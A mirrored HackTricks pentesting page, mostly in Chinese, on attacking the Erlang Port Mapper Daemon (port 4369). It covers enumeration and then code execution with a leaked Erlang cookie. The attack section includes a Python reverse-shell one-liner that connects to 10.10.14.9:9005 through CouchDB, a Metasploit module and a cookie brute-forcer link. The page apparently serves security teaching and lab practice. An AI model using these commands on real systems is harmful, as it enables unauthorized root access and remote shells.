Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 14:40:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md

111 lines
5.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# 基本信息
**Erlang Port Mapper Daemon (epmd)** 作为分布式 Erlang 实例的协调者。它负责将符号节点名称映射到机器地址,基本上确保每个节点名称与特定地址相关联。**epmd** 的这一角色对于不同 Erlang 节点在网络中的无缝交互和通信至关重要。
**默认端口**4369
```
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
```
这是在 RabbitMQ 和 CouchDB 安装中默认使用的。
# 枚举
## 手动
```bash
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses
```
## 自动
```bash
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
| bigcouch: 11502
| freeswitch: 8031
| ecallmgr: 11501
| kazoo_apps: 11500
|_ kazoo-rabbitmq: 25672
```
# Erlang Cookie RCE
## Remote Connection
如果您能够**泄露认证 cookie**,您将能够在主机上执行代码。通常,这个 cookie 位于 `~/.erlang.cookie`,并由 erlang 在第一次启动时生成。如果没有手动修改或设置,它是一个长度为 20 个字符的随机字符串 \[A:Z]。
```bash
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
Eshell V8.1 (abort with ^G)
At last, we can start an erlang shell on the remote system.
(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
```
更多信息请访问 [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\
作者还分享了一个用于暴力破解cookie的程序
{% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %}
## 本地连接
在这种情况下我们将利用CouchDB在本地提升权限
```bash
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
```
示例取自 [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\
你可以使用 **Canape HTB 机器来** **练习** 如何 **利用这个漏洞**
## Metasploit
```bash
#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce
```
# Shodan
* `port:4369 "在端口"`
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
Reference in a new issue View git blame Copy permalink